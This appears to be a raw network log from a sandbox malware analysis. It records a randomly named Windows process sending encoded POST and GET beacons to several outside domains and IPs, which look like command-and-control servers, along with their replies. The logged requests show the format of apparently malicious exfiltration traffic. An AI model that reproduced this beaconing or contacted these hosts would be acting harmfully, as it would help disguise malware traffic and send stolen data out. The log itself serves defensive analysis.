39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e [TRUNCATED] Data Ascii: 592<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 — Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css">
Jan 11, 2025 01:56:25.422144890 CET	1045	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 Data Ascii: body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-sp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49994	18.163.74.139	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:56:38.778493881 CET	683	OUT	POST /okq9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.fzmmkj.shop Origin: http://www.fzmmkj.shop Referer: http://www.fzmmkj.shop/okq9/ Content-Length: 215 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 43 4b 55 4b 39 2f 2f 5a 65 45 61 36 53 6a 76 39 64 70 69 32 34 50 72 47 38 73 66 4d 57 67 54 64 52 57 7a 43 66 5a 63 42 2b 73 49 44 68 2f 35 6b 5a 41 43 37 5a 2b 30 4e 2f 4a 5a 6b 43 2f 67 5a 36 68 32 6e 66 4a 45 69 70 2f 75 6b 47 39 4a 4f 4f 53 66 4a 5a 49 47 47 48 64 6b 43 32 58 6a 4e 39 68 41 66 35 36 53 48 76 55 37 52 30 58 38 72 62 33 6c 30 68 6b 4f 48 52 34 2b 31 57 36 39 76 4a 70 70 4a 51 33 4c 67 69 77 76 71 50 62 62 41 38 74 35 4e 38 56 34 43 68 77 65 36 44 56 42 43 36 62 50 41 5a 41 4f 2b 6b 36 48 4e 76 5a 78 6f 39 53 6f 63 39 47 51 75 47 6b 66 6f 51 30 62 72 70 4d 30 33 35 56 6d 50 4f 6e 4e 72 71 70 66 76 34 67 3d 3d Data Ascii: 9F=CKUK9//ZeEa6Sjv9dpi24PrG8sfMWgTdRWzCfZcB+sIDh/5kZAC7Z+0N/JZkC/gZ6h2nfJEip/ukG9JOOSfJZIGGHdkC2XjN9hAf56SHvU7R0X8rb3l0hkOHR4+1W69vJppJQ3LgiwvqPbbA8t5N8V4Chwe6DVBC6bPAZAO+k6HNvZxo9Soc9GQuGkfoQ0brpM035VmPOnNrqpfv4g==
Jan 11, 2025 01:56:39.580712080 CET	163	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 00:56:39 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49995	18.163.74.139	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:56:41.319992065 CET	703	OUT	POST /okq9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.fzmmkj.shop Origin: http://www.fzmmkj.shop Referer: http://www.fzmmkj.shop/okq9/ Content-Length: 235 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 43 4b 55 4b 39 2f 2f 5a 65 45 61 36 55 41 33 39 52 71 36 32 36 76 72 4a 6c 63 66 4d 66 41 54 47 52 57 2f 43 66 59 70 61 2b 66 67 44 67 64 78 6b 61 42 43 37 61 2b 30 4e 78 70 5a 38 49 66 67 43 36 6d 2b 5a 66 4a 49 69 70 2f 53 6b 47 38 35 4f 4f 6c 72 4f 5a 59 47 2b 4c 39 6c 6b 35 33 6a 4e 39 68 41 66 35 36 47 35 76 55 6a 52 30 6e 4d 72 61 57 6c 33 73 45 4f 45 62 59 2b 31 64 61 39 56 4a 70 6f 71 51 32 57 48 69 7a 48 71 50 62 72 41 2f 38 35 4f 72 6c 35 4a 76 51 66 49 41 51 73 58 77 70 6a 6f 65 78 79 64 72 39 50 5a 6e 50 77 4b 6e 77 6b 77 6a 58 6f 56 43 6d 37 65 48 53 47 65 72 4e 77 76 30 33 53 75 52 51 6f 42 6e 37 2b 72 75 55 62 48 61 74 63 66 35 61 39 69 4e 4e 43 7a 70 37 34 2b 53 72 51 3d Data Ascii: 9F=CKUK9//ZeEa6UA39Rq626vrJlcfMfATGRW/CfYpa+fgDgdxkaBC7a+0NxpZ8IfgC6m+ZfJIip/SkG85OOlrOZYG+L9lk53jN9hAf56G5vUjR0nMraWl3sEOEbY+1da9VJpoqQ2WHizHqPbrA/85Orl5JvQfIAQsXwpjoexydr9PZnPwKnwkwjXoVCm7eHSGerNwv03SuRQoBn7+ruUbHatcf5a9iNNCzp74+SrQ=
Jan 11, 2025 01:56:42.253429890 CET	163	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 00:56:42 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49996	18.163.74.139	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:56:43.865787029 CET	1716	OUT	POST /okq9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.fzmmkj.shop Origin: http://www.fzmmkj.shop Referer: http://www.fzmmkj.shop/okq9/ Content-Length: 1247 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 43 4b 55 4b 39 2f 2f 5a 65 45 61 36 55 41 33 39 52 71 36 32 36 76 72 4a 6c 63 66 4d 66 41 54 47 52 57 2f 43 66 59 70 61 2b 66 34 44 67 75 70 6b 59 69 71 37 62 2b 30 4e 35 4a 5a 2f 49 66 68 51 36 67 57 64 66 49 30 59 70 36 65 6b 47 65 78 4f 66 68 33 4f 54 59 47 2b 55 4e 6b 44 32 58 69 50 39 68 52 57 35 36 57 35 76 55 6a 52 30 6c 45 72 64 48 6c 33 2f 55 4f 48 52 34 2b 68 57 36 38 62 4a 70 68 52 51 32 43 39 6a 43 6e 71 50 2f 50 41 36 4f 68 4f 70 46 35 4c 2f 41 66 51 41 51 70 48 77 70 76 6b 65 78 47 6e 72 36 4c 5a 30 34 73 57 33 42 38 70 33 30 77 39 4f 6d 7a 77 4e 42 57 74 76 66 77 70 36 46 65 5a 62 42 59 30 69 6f 33 6d 34 79 48 41 4d 65 67 5a 31 34 70 77 4e 38 43 35 7a 35 30 71 4a 4f 4e 62 4a 66 51 6d 38 79 58 35 41 7a 31 71 58 75 59 6e 67 37 4c 48 72 4a 69 32 73 6c 53 57 63 73 6e 48 31 7a 65 62 32 75 5a 59 30 2f 37 4f 41 4c 79 58 73 50 6a 37 34 45 70 39 73 35 6c 70 62 68 6f 39 68 59 2b 75 4e 4a 39 7a 6a 4d 34 67 4d 64 42 41 6d 38 6c 32 67 66 6b 39 78 4a 72 51 70 4f 57 32 57 4d 34 68 54 72 48 [TRUNCATED] Data Ascii: 9F=CKUK9//ZeEa6UA39Rq626vrJlcfMfATGRW/CfYpa+f4DgupkYiq7b+0N5JZ/IfhQ6gWdfI0Yp6ekGexOfh3OTYG+UNkD2XiP9hRW56W5vUjR0lErdHl3/UOHR4+hW68bJphRQ2C9jCnqP/PA6OhOpF5L/AfQAQpHwpvkexGnr6LZ04sW3B8p30w9OmzwNBWtvfwp6FeZbBY0io3m4yHAMegZ14pwN8C5z50qJONbJfQm8yX5Az1qXuYng7LHrJi2slSWcsnH1zeb2uZY0/7OALyXsPj74Ep9s5lpbho9hY+uNJ9zjM4gMdBAm8l2gfk9xJrQpOW2WM4hTrHRJjo4XsE3PQCEiYRxOif/pXWAl1q9fJmHfSewnBwIS8atl1tsyTl22/YAtUP1PGAE6H2jgOv+/wiWRmq2/Clfql6PEamjHzesie/HXdaURQQoKmyb8/lgKF/Nd87oQxXVuEfXqqclzc6Ru6FwUWfQC95a2B2sWH2V/DgXccWqtVYrAadNzUVyb5lrxsHhXNfws8S9SPnY3z233yVdb+o5q8AQWSObvKkxUjQocSRGMOpAF5R1xRN3eCxiwxBo4vB12F0dt2e06gN9339fJwB92mJ99BHlRpDF0khFo132HyRjeAiJs+OSpFwq2Ks7FkFNMt3TAlhGiXUsKCIR4GwkzJfimOBXsYnc6GQOt7gTB2cHJ7YI6JGaVSz3+hA/wO55cdG3N7on+GMG3wp+O7x0qdtVe90ytHogPIciE01970GTwW5UB8QAw7DxgqK/mZXbcwPzrg7PgYKqkIxbhPW/H2YoNWqUCFSen4sCNidCui3M2q36cA8BC8JujVuOehd/1YDDrs559FaxuPcZ5B56GGBVjU/oBok3rmICfBvrmChVROam7Zuj36Zbj0/5rsikqFIfsAduOWsDY38XG4jwx/8drjllhpM00ZGHBWtVOfL+Ro9IdsNtw1dwfL/TJY8AO/Js0YglyGHiORMQ7RqgNLmE/MTwwBQ3W [TRUNCATED]
Jan 11, 2025 01:56:44.783360958 CET	163	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 00:56:44 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49997	18.163.74.139	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:56:46.407867908 CET	426	OUT	GET /okq9/?wtE0B=1LjxZz&9F=PI8q+JzCRiOLWB34dIea6eHgxdHcHle1WGGbYrpy5vcnpPBpYhW1E+E28c0ZH40azQD/W5sl2JWCO69xdVXiEbuzBudp5nCUhGIegbiFnEWG6GstFFRY+32jX4CHZZoFFrpuAXy7pwuQ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.fzmmkj.shop Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 01:56:47.343079090 CET	163	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 00:56:47 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49998	162.218.30.235	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:56:52.918998003 CET	680	OUT	POST /798t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.l03678.xyz Origin: http://www.l03678.xyz Referer: http://www.l03678.xyz/798t/ Content-Length: 215 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 2f 52 38 54 48 70 34 58 4c 69 2f 4c 50 72 49 51 4c 58 39 68 71 46 61 48 54 73 30 79 34 47 2b 46 54 69 64 37 30 48 67 48 5a 32 7a 54 65 43 7a 6a 55 37 69 6b 51 76 46 46 63 70 52 49 6c 45 59 7a 56 4a 61 39 6f 72 77 2f 4e 48 66 6d 73 72 51 43 6e 6d 66 30 72 2f 2f 59 4c 33 6e 56 54 4d 69 67 43 49 5a 77 46 39 6e 78 48 6d 42 6f 54 4e 57 73 4f 36 62 57 48 73 31 4b 76 2b 62 59 6c 4a 44 49 59 36 7a 37 79 6a 4e 2b 57 6b 39 4d 4c 31 62 52 77 38 4b 77 75 6b 64 31 79 51 36 7a 4f 64 66 77 33 77 48 76 63 4a 37 43 5a 59 42 62 48 2f 49 6b 73 4e 48 2b 63 6f 47 5a 51 48 6a 5a 75 46 35 75 50 32 38 37 41 62 33 46 73 67 6a 70 4c 4c 55 6a 4b 41 3d 3d Data Ascii: 9F=/R8THp4XLi/LPrIQLX9hqFaHTs0y4G+FTid70HgHZ2zTeCzjU7ikQvFFcpRIlEYzVJa9orw/NHfmsrQCnmf0r//YL3nVTMigCIZwF9nxHmBoTNWsO6bWHs1Kv+bYlJDIY6z7yjN+Wk9ML1bRw8Kwukd1yQ6zOdfw3wHvcJ7CZYBbH/IksNH+coGZQHjZuF5uP287Ab3FsgjpLLUjKA==
Jan 11, 2025 01:56:53.446706057 CET	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/ Server: Microsoft-IIS/10.0 Date: Sat, 11 Jan 2025 00:56:52 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 36 32 31 32 38 2f 37 39 38 74 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/"></a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49999	162.218.30.235	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:56:55.462291002 CET	700	OUT	POST /798t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.l03678.xyz Origin: http://www.l03678.xyz Referer: http://www.l03678.xyz/798t/ Content-Length: 235 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 2f 52 38 54 48 70 34 58 4c 69 2f 4c 4d 4c 34 51 47 51 68 68 72 6c 61 45 59 4d 30 79 68 57 2b 65 54 69 5a 37 30 47 6b 75 5a 6a 6a 54 65 6d 6a 6a 56 36 69 6b 63 50 46 46 58 4a 52 4e 6f 6b 59 6b 56 4a 47 31 6f 70 6b 2f 4e 42 7a 6d 73 75 73 43 67 58 66 31 71 76 2f 65 44 58 6e 54 4f 63 69 67 43 49 5a 77 46 39 7a 62 48 6d 5a 6f 50 73 6d 73 50 62 62 52 4c 4d 31 4a 73 2b 62 59 68 4a 44 4d 59 36 7a 6a 79 69 67 72 57 69 68 4d 4c 33 44 52 78 74 4b 33 6c 6b 64 37 78 67 37 66 41 39 2b 34 36 54 66 30 63 62 4f 59 51 70 51 35 47 4a 4a 47 32 76 4c 53 43 35 2b 69 55 46 48 76 35 6a 6b 62 4e 33 34 6a 4e 35 44 6b 7a 58 47 44 47 5a 31 6e 63 2b 75 68 61 42 59 4c 53 2f 67 77 5a 36 4c 6d 4e 6d 4b 54 31 4f 59 3d Data Ascii: 9F=/R8THp4XLi/LML4QGQhhrlaEYM0yhW+eTiZ70GkuZjjTemjjV6ikcPFFXJRNokYkVJG1opk/NBzmsusCgXf1qv/eDXnTOcigCIZwF9zbHmZoPsmsPbbRLM1Js+bYhJDMY6zjyigrWihML3DRxtK3lkd7xg7fA9+46Tf0cbOYQpQ5GJJG2vLSC5+iUFHv5jkbN34jN5DkzXGDGZ1nc+uhaBYLS/gwZ6LmNmKT1OY=
Jan 11, 2025 01:56:56.038284063 CET	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/ Server: Microsoft-IIS/10.0 Date: Sat, 11 Jan 2025 00:56:55 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 36 32 31 32 38 2f 37 39 38 74 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/"></a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	50000	162.218.30.235	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:56:58.007899046 CET	1713	OUT	POST /798t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.l03678.xyz Origin: http://www.l03678.xyz Referer: http://www.l03678.xyz/798t/ Content-Length: 1247 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 2f 52 38 54 48 70 34 58 4c 69 2f 4c 4d 4c 34 51 47 51 68 68 72 6c 61 45 59 4d 30 79 68 57 2b 65 54 69 5a 37 30 47 6b 75 5a 6a 72 54 66 52 4c 6a 55 5a 4b 6b 64 50 46 46 55 4a 52 4d 6f 6b 59 6c 56 4a 65 78 6f 70 59 76 4e 45 76 6d 6a 73 55 43 68 6a 7a 31 6c 76 2f 65 42 58 6e 53 54 4d 6a 6f 43 4f 35 30 46 39 6a 62 48 6d 5a 6f 50 76 2b 73 66 36 62 52 4a 4d 31 4b 76 2b 62 55 6c 4a 44 6b 59 36 72 7a 79 69 56 51 57 55 52 4d 4b 58 54 52 7a 66 69 33 6f 6b 63 64 34 77 37 48 41 39 79 33 36 51 37 57 63 66 50 50 51 72 41 35 4b 6f 34 4e 73 66 4c 7a 42 71 43 49 65 57 4c 33 38 68 67 74 4e 6b 45 2b 49 71 72 43 78 31 2f 34 4a 4a 56 64 59 34 37 54 4c 42 67 46 57 63 77 35 56 36 32 4f 57 55 71 51 6e 4c 37 2f 2f 58 69 6a 68 78 6b 72 6c 77 34 4f 77 54 32 58 70 52 45 35 2f 79 52 2b 35 57 72 55 47 48 76 38 6d 6a 45 6a 32 37 48 4b 37 6f 73 2b 44 72 49 36 6f 56 51 65 48 64 54 39 67 64 6f 4f 67 62 61 78 59 66 70 42 62 2f 30 48 6f 5a 69 49 7a 43 77 39 33 4d 79 39 79 6b 31 49 6d 6e 46 6b 44 65 51 4a 44 53 2f 38 37 2f 54 [TRUNCATED] Data Ascii: 9F=/R8THp4XLi/LML4QGQhhrlaEYM0yhW+eTiZ70GkuZjrTfRLjUZKkdPFFUJRMokYlVJexopYvNEvmjsUChjz1lv/eBXnSTMjoCO50F9jbHmZoPv+sf6bRJM1Kv+bUlJDkY6rzyiVQWURMKXTRzfi3okcd4w7HA9y36Q7WcfPPQrA5Ko4NsfLzBqCIeWL38hgtNkE+IqrCx1/4JJVdY47TLBgFWcw5V62OWUqQnL7//Xijhxkrlw4OwT2XpRE5/yR+5WrUGHv8mjEj27HK7os+DrI6oVQeHdT9gdoOgbaxYfpBb/0HoZiIzCw93My9yk1ImnFkDeQJDS/87/TA4kolCUEv4kwH3XjDdcasFl7wOE5M5n2i72oBuuE4Q1Anuam27325wLKYx6WHGXI2/4JNZNKPk8tfcu2HEtW0kPkQcQQGeK243YoEQQ8Kr3fsWXSFF62gxzeEg6haV6+VPa1Y0dicbLfzwtRZWVjr3MEOEogAWGmk9vvMzByjAijIcTNg1XZElwTf1HYnnpKx4w+p+whzzx4u3B0rAQmAXqCeQmVRNXvVs6RxKcS9vIb4yeQ3obGvgpPBx/SRKbYFU1yYmJvnpjfXAnY473RGi5uOKVGhWKVAn1RkptJ5H+r76i6XOh6wLrIMVWSyXrl9dCqaBL1TLcrzFnNEzCtVMCbdB5QzrLwtsw8CUuPaG19Gdfab4GfE0F6+Du+GZYNv3pDTm0428sADTUbnQn3bjBJiL900jfjetShDO0ljWkgjMvqYvVA0xgEfjQ7tv3r3nY7EabqaKIP629W3yW4V0ItOSaGcsJLUcwO8vc5kquPKii2ywRT6NHtFpYCshqYd9HL69hF6m9eCtGURycOFYB4xLkoV3G/Hpu3V3Bip5yoBnNuNyd8USKEYJkhTXAMzFJzrzIuSnjZoWnQH0UghpVDtWcHnPijPeJWRm0RdzEe7o+b4zsR3Td63nEBpyLYE4ITRetuI+TmGR1yZWGIhmfEtzrgr8id7N [TRUNCATED]
Jan 11, 2025 01:56:58.590877056 CET	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/ Server: Microsoft-IIS/10.0 Date: Sat, 11 Jan 2025 00:56:58 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 36 32 31 32 38 2f 37 39 38 74 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/"></a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	50001	162.218.30.235	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:57:00.549356937 CET	425	OUT	GET /798t/?9F=yTUzEcgndw7KboVFHT9arl6MXaU44mjtDVZL03kfN2SLXi32Rry3GMticKdTmzUGS/LvnIcIaX/Cuqcp6D2L1KHgDhjkH8i+BogGG+P5HmtoXOiMf53XRo99vMLso5GtXZXy7Rd2RFdT&wtE0B=1LjxZz HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.l03678.xyz Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 01:57:01.108649015 CET	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/ Server: Microsoft-IIS/10.0 Date: Sat, 11 Jan 2025 00:57:00 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 36 32 31 32 38 2f 37 39 38 74 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/"></a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	50002	192.186.58.31	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:57:06.498294115 CET	689	OUT	POST /lkpz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.aihuzhibo.net Origin: http://www.aihuzhibo.net Referer: http://www.aihuzhibo.net/lkpz/ Content-Length: 215 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 58 38 55 4e 61 34 31 56 54 56 77 54 6c 38 4a 57 32 72 57 75 63 67 66 75 75 41 61 4c 62 6f 61 63 64 7a 77 6c 4e 46 2b 37 44 53 4e 6a 43 54 5a 5a 74 72 6d 6d 5a 42 64 47 4d 4a 62 58 39 70 46 75 76 30 